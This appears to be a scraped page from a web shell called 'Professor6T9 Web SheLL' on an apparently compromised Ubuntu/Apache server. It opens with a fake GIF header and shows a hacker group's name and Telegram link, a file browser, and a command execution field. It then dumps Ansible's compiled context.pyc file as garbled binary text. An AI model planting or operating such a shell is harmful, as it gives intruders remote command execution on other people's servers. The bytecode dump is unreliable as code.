GIF89;aGIF89;aGIF89;a
Team Anon Force
https://t.me/Professor6T9x
Professor6T9 Web SheLL
Linux sonniq.ru 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
127.0.0.1
/
lib
/
python3
/
dist-packages
/
ansible
/
__pycache__
[ HOME ]
Exec
Submit
context.cpython-310.pyc
o ��t` � @ sh d dl mZmZmZ eZ d dlmZmZ d dl m Z d dlmZm Z dZei �add� Zdd d�ZdS ) � )�absolute_import�division�print_function)�Mapping�Set)�is_sequence)�CLIArgs� GlobalCLIArgs)�CLIARGSc C s t �| �adS )z%Initialize the global context objectsN)r Zfrom_optionsr )Zcli_args� r �1/usr/lib/python3/dist-packages/ansible/context.py�_init_global_context s r NFc s � ��fdd�}|S )aA Closure over getting a key from CLIARGS with shallow copy functionality Primarily used in ``FieldAttribute`` where we need to defer setting the default until after the CLI arguments have been parsed This function is not directly bound to ``CliArgs`` so that it works with ``CLIARGS`` being replaced c sD t j�� d�} �s| S t| �r| d d � S t| ttf�r | �� S | S )N)�default)r �getr � isinstancer r �copy)�value�r �key�shallowcopyr r �inner/ s z#cliargs_deferred_get.<locals>.innerr )r r r r r r r �cliargs_deferred_get&